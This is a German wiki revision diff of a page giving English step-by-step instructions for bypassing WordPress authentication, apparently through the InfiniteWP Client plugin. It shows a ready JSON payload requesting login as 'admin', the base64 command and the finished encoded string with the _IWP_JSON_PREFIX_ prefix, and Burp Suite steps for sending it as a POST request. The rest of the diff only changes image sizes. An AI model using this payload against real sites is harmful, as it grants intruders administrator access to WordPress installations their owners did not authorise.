Version vom 12. April 2022, 07:09 Uhr

Request

Payload: {“iwp_action”:”add_site”,”params”:{“username”:”admin”}}

Append the base64 generated payload with the String mentioned in the exploit URL.

Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

Right-click on Burp suite, and click on the “Change request method” to convert the request from GET to POST.

@@ Zeile 1: / Zeile 1: @@
+=Request=
 *Reload the target website and intercept the request using Burp Suite.
-[[Datei:Authentication-Bypass-Wordpress.png]]
+[[Datei:Authentication-Bypass-Wordpress.png|500px]]
+=Payload=
 *Create the JSON payload and convert it to base64.
@@ Zeile 7: / Zeile 9: @@
 *echo ‘{“iwp_action”:”add_site”,”params”:{“username”:”admin”}}’ | base64 -w0
-[[Datei:Authentication-Bypass-Wordpress1.png]]
+[[Datei:Authentication-Bypass-Wordpress1.png|500px]]
 *Append the base64 generated payload with the String mentioned in the exploit URL.
@@ Zeile 15: / Zeile 17: @@
 *Place the payload created as POST request arguments.
-[[Datei:Authentication-Bypass-Wordpress2.png]]
+[[Datei:Authentication-Bypass-Wordpress2.png|500px]]
 *Click on Forward and turn of the intercept.